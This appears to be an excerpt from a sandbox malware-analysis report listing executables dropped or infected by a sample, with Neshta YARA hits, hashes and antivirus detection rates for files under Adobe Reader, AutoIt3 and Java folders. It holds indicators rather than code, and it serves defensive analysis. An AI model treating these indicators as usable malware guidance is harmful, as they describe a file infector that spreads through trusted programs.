                                                          SSDEEP:1536:JxqjQ+P04wsmJCdjrXDyO4zkm8dbHVLokF8iJTwRH0n:sr85CVrMzkm8PL3Eo
                                                          MD5:A42467B5C21814776277B4CE3456D716
                                                          SHA1:B01DD2412ADA123EF3D6317F839826D37C6A27D4
                                                          SHA-256:B1A5063A32CB8AFD591C57AAB1A679137EE29A886AF77849A13C26537A100AD9
                                                          SHA-512:62D2AECABE4892E0E25A9787A28898EC989A4AA54A66CDB7DE65EB48A8634E0274EB6515722EA1FA580C848E1AD683C75CE26F6AB7D7F7E48A5DD064DD1B3A24
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: Metadefender, Detection: 91%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.228109838185618
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC3uireklhKsikOkCWfNU:sr85C+ilU9xL
                                                          MD5:B9A06C8C07B4BC86001ABCA5835AEED2
                                                          SHA1:5EA2F32AD6F1642498CDE9F8CA74D8A70DE376E0
                                                          SHA-256:1531CA6AD23335F3F93231D153CB9DDEE40580A5A82D502AD6F7B54C8328D8B4
                                                          SHA-512:79C9F72832E53AED9E50C680F0146E6F971D77299E192DD61500E8B91117E19373C7EC92B84A31B2934FD65CD6090E9613BC6F62A2337A1313E7E52A1041B04E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.26326337462311
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCFbIJyoI91593nKMd/VHT:sr85CFboI9133K+HT
                                                          MD5:7C2E8C0527C5CFF276FB2FFA314D455A
                                                          SHA1:6B6FD014B9C295838E0F1F2D563C185A0004C028
                                                          SHA-256:41AEBB2A2B6175595684D20DF5F7B8AB8FEB2B5662530F6593287F9F72777296
                                                          SHA-512:2138731F6006CB6DF13821E05DC16EDEBF7F70777906AB03271707A1237DBFD8859ED43795F36A87901D63BDAA4CC738E46B9D2D0D6361546FD64A2AE56EB65F
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.079745714518026
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJCBF45im0N0I9U96lOQ7ABFPXdLtZqWn:JxqjQ+P04wsmJCJ4wNlu9HQIXsW/44
                                                          MD5:E6A82ED5EA7010F781B63E30C2377BEE
                                                          SHA1:1829EE1E5E5B34C9721F4EB51E3AD09F7A13DCE2
                                                          SHA-256:E02365CA739F356FE66B4F49C4D11EC156B0BB512211A177A813FC7D8B0C2DFD
                                                          SHA-512:2FD5BAF35A018DFF7FCA19A4C118E781FC9D03F9DDED1CEE8F2A5E9E6E41F1C99D984F24E5AB3E60AC2FFBD1B505F728410203D11234197D109BFDEC728ED40D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 94%
                                                          C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.352749197508949
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCZti/kCXBIvpnJXCFgyf:sr85CzgkC+Jt6gA
                                                          MD5:E784AF0ED9D53B2A29B2EBBDDE7E470B
                                                          SHA1:203533AB59D90155BE6EC83B9E7FD643869FBA9D
                                                          SHA-256:D8B35FBB5A6A4E3069FF8E60BB9F35670DEEB5B5933820CCC4FC9D9D4148EB78
                                                          SHA-512:A2C77DD2CB33815273C4730892FB45F2EB086853CE7544890FA970F666249FCA61AEDFB826109293066C2F615B95CAE48E9C28F96B0C59D6EA0423B337BDF291
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          C:\Program Files (x86)\AutoIt3\Au3Check.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.395396839059979
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCBBTfrVijfDZaoXFdP+aWYEsPnBEbfOjBvX5zjjSbE51E6AoAV9:sr85CnfrV5EAVMczsELz7Vz
                                                          MD5:B4E63C549366CFCDA2363E35C197D41C
                                                          SHA1:10E1078FF8D1FD5FF2080FCB659A012630FD07E8
                                                          SHA-256:68BE6B2F5E8181E4E36DB6F370E3110C43D702E6953735FE6843D230FA6E7A37
                                                          SHA-512:FB0B06847F459BA7D439D20608C3A098AA01B18FEBBF3D014536A3CF21353EC0524922056BF151B3A0F66E00E758C36CDC49B44A59C81F78B6249E93B535C893
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          C:\Program Files (x86)\AutoIt3\Au3Info.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.509452568334581
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCXl/TR5SDQQfzSIOOc1c:sr85CXFR5StHe+
                                                          MD5:A7D23C329BAABBA8B883C9B0EACCE4A5
                                                          SHA1:0E2B51FF3DA7806D0F5DCB403222D06637B08738
                                                          SHA-256:C2521122926A26FFDB7E9D56EE6E24682F1C76B573BEE8765E9E287CB1DCAE89
                                                          SHA-512:22116FE8362AA86EDBD268EF90A415B4E204416C39AB0312EFFA6E3C2C7C6AB85B000A642443DA071F61E3C370398D6C018E8F4582E9E854BAF2B3BCAB7E5D30
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.476428579556002
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCzbdrFQAj9UlJZ4PAZav4RLRLK:sr85CfQO9UKRGRLK
                                                          MD5:02879251FEBD3B13DFA84C0DBB3B9387
                                                          SHA1:D2226312A4460980B036C0CFD3B7BF95752145D9
                                                          SHA-256:28C72711975DEA1917D0B4C996D93E945F0487DFBDEB1A0B298E9A724F6E8937
                                                          SHA-512:864BF0149EBBF033306C7B0FBD168D696DFFFEE012B61991C5F0B4D35F82ECE7FE276EBEDE901BF30E22529D8EDEDF3EE3FF64F9D18A411624DB3188ABA45E4E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.520333669037674
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC32EQwB3BsLsWIGihj58u9otwqtOk:sr85C325wztj5xiv
                                                          MD5:32C22D658E9A54E56C54B1A2AFE1D817
                                                          SHA1:E1DA8AA26A509BC23A761EB25267DCE9F8A7EF92
                                                          SHA-256:C957D33A54BD308948E37F020C3FD23DCBE4762DF1143EFAE8109433342DE76C
                                                          SHA-512:C669F6999EA0ABC48D7AEFB32CD067F37B2894C8EDB1EC538063ED47B719A4597C5BFB770C821DE0D0384FE3B4AC212368B629284D8740E8855D7281A84590C9
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.481287941039048
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCrwiuLWf6G/YemcUCYY8AZqQwOp9yQeRoL3:sr85C0iuVAYemcUCN8AwhOpCoL
                                                          MD5:9C8E99E8AD1568B91CBC2A9FE09304A8
                                                          SHA1:DCD08E9FE8ACFEF7F194CF0E6759F5468FA028EC
                                                          SHA-256:A33D6E9432C5D3E83EE5CFEC260EB5C1396982EFC713DA6C5B31F67712272B41
                                                          SHA-512:68270258389E3EC950F6E1535D2EA7271611A57268B7897E4C76237122DF2B7E15884F4F110C11DFB711BDF42F80F682BC0D81D62E16C954EB7AE0EC43DEF349
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):7.2906774035349695
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCloZCsdndoviDI47IcIyh3e01pxDQOF:sr85C+Z1noWILcIys01vQOF
                                                          MD5:9B9601BFE0B0E353A4AB8B3FA54F7540
                                                          SHA1:BFCC868475761DB126FBCE6D36A8F3696C00FD3F
                                                          SHA-256:289C2D7F33C2ACB203D47A677ABEBC41A6D4D580BFBB3E80A4AD65D35DC65AB8
                                                          SHA-512:AC65B689940E9CA2A02CFE07F7D53C024B3E612621CCA202DAAE1E37709D66C713C7865C336DBCF8248FC42A55776B3327F9B2AA71C7FAED2F547AFFC4DC15EE
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.586052312714495
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZe5EaY1O/TqX0YpwD3nwBoX0M12Pnhq:JxqjQ+P04wsmJC5QOgVKnwBvPlnJml5
                                                          MD5:934C8B78754C1FB79DF08EF114600899
                                                          SHA1:5A50BBC6139CF24D3785A1AC5BC1303087ACCFE6
                                                          SHA-256:12A68206D1263D798EB284C9A6EF654E4ACFAD20310AFAADB092B54A20358A3A
                                                          SHA-512:DFF08DAADC807CF170FDC13D4C2EC20D0567B6B4F91D1853F737A6B57ECBBD332EC98D237EF4705E77693361AC3027D0298F194BD10472A2AFF9338616B8C47D
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.529393382316189
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC34bCTNhZYt+zphjirUcYkzzaOvo:sr85C3MCR74+/+YcW6o
                                                          MD5:B6BA74867ECBA5541827551FEEC46F7A
                                                          SHA1:62AFF9292E306BC442F46D8835CDBA2F777A0BF1
                                                          SHA-256:8D6A0F83B4FB84B8670BB9C103071B4D40CA433876242B476DB83BDB683FC446
                                                          SHA-512:850385B0D7ECF20BEC4406D0EFB1AB0A01D9B42E2011FAFC94A8DDB49932FC3B2EB0F6D486903B84D72518928567E96BAE638891F578B9C7CD32C0CEFAC052C4
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.7205787223638
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCA75/gWXq7+8aTaI/dBKvFBvqNm48fnRV2B:sr85CA0a8aTaI/dMrvkL8fnR6
                                                          MD5:29BAF7AE561A3CCC4EF6A6988D57324D
                                                          SHA1:B2D3512E166A5F9E10FAA4E461F6EB5A6B926531
                                                          SHA-256:0B607DF09D9876EC9A80D77B9F2E20267B611A75DA95962FD2DACFF286E00F9F
                                                          SHA-512:A8CF29B616CF505F8A52E0775F0B3859F29A56181F3E1D5B16B86B40FD4E5BA0ECC5DD81098AC1024A32A1CA4575CD9B7F9F6FB2D22C75F808FE32A124065015
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Program Files (x86)\AutoIt3\Uninstall.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.52588514314363
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCWCrRRPYqa5pic6jXFdL2KiMceCry:sr85CWCrbPA6jXFN2MceCry
                                                          MD5:DF57A3FC85CD6B6CFB31C52714E2D79E
                                                          SHA1:D4DA4DA44C58BB9B818CAF22C7A578FF1EDECF26
                                                          SHA-256:E660F04725795D12A67A796BA9A96889216C2CAE4A6ADA2459F7948428136BC1
                                                          SHA-512:14FBDFFF9E7689A2800A150FB3EB7F50E12A25DEBBC7CF18ADADCDAE925A72DE8E942F5A1AC0023D419C965E2DF9684217D13A95A1AD6C1FF2B61D1B2B814F70
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.484749959894503
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCmG7XF7ifrIgo8SPntaYEll7AJ:sr85C3F7iMMSVCm
                                                          MD5:2E784E04B6470C8FDD50399F1ED4FF7E
                                                          SHA1:4B51ACB85DE25350D6331202884C1F405DF8231F
                                                          SHA-256:B43C70781E9BA983C9EB256B24E80D998EFB3FEC878FF193C9D11709B89A9040
                                                          SHA-512:2DDB9B10A7514FC5844FDAF47CB0647F020B4359AAC105415F2A143A336AE194124C903A547FBD8C7FE73B596EBB79F958EA84F867CB326FBF203902B63EA67F
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.4710468077094445
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCmGDLaAcF7u9nAlRPL/a9L:sr85C3+u9n8T/aZ
                                                          MD5:AAB384021CCD99B08F91D550581310EA
                                                          SHA1:16DE7D37E9B8312551F1EAB96FCAC0CBBA73A166
                                                          SHA-256:3626F66835F8FD11C6515E55E9CC7B6DA710FFCA9101632CBB69D2F7D2390E71
                                                          SHA-512:D56589D12F983FF96FE8FF4B9AC4FF0CAD531036272308BB2A2CD4A101D7998005397E8FE50A9E4D3B1EC3E203908DC4EE5071545A844BBB497CF6FE67E0B020
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.426705359459557
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJChNBfkv2pymXndR1wF3u20:sr85Chi3m3pwF+20
                                                          MD5:84E45C930A79BBB3239D4929503FC38C
                                                          SHA1:2AED49DEAF2CF13CFAEA97FE5CF217A01E4BD08A
                                                          SHA-256:CAC1AE6F9B9623E171517C8AE1609A8E21626D9FBF3EE400325E371ACE843444
                                                          SHA-512:7AFA1BF9237E28AA97918E9806A045A565154599C4DD0882C8B106D25E5410EFCCBDCD01015E156B724009F2A884CA5E1D43C398453769BF9B3021195C6D3FA8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.599158686971261
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCKhp8N3YERomt8JCeToWZmKbt1H0jKWo:sr85CKn8N3YEuTofE1H0jKWo
                                                          MD5:294D120414736A7579445CCCA78F505C
                                                          SHA1:4DC265A2FC75AF686DA3EC830BF9C0072AF14581
                                                          SHA-256:AF7E482890D77DAD13F0D5A1377DEFA83CF2D802DC1444A69FD17A464C4A446C
                                                          SHA-512:8DC9F174875DD7012030EC6FE1624AAA99E068DD464BE4AEFDBA9699C39969DF0E52214B90BC46ACE204D2505DDD69C46D674DE39A6BFAA3DE213DFCA66ED196
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.6085003171859364
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC/rmKN/MZzagYK5o2IQJ/rVSgvV:sr85C/qA/WadUDFBZz9
                                                          MD5:89DC2A4E5290AE1297C2281B5CD35068
                                                          SHA1:1D091812669D1D0CF0293B9D495599BF257434D9
                                                          SHA-256:5116F46AD2BE5B402FAD8B89350F671576D995ECCF91863D827984AE42319596
                                                          SHA-512:2CECAFADFE911CAEF8F735192F7F1D60305BBBA6A390E13CDB4B5055413D931B75F276086F18AE36E32FEF31DD3B37FDDECD1FDB9F4EC12938B1EFABCD6D7E07
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Author: Joe Security
                                                          C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.62851477500423
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCsrkFN/GjcAShJITZOG8i4e53hS5PobC:sr85Csk0cA6JITt8cXbC
                                                          MD5:61694544EA704A28532F4EC0319AC735
                                                          SHA1:F6ED53FF2792797D40ECA888567873F0570698E6
                                                          SHA-256:4183F6849773F9EED9279D5237C93719511F605276F0EB9BF2E8B2258BBAED09
                                                          SHA-512:5004069D9A41811B63CD84A049757A2F2CB061D1D6999FAE9EC083C4AE3C850BAD9D59112B452118A0AA231A4F07145D03C62FDB699074F4610D4899A662C922
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Author: Florian Roth
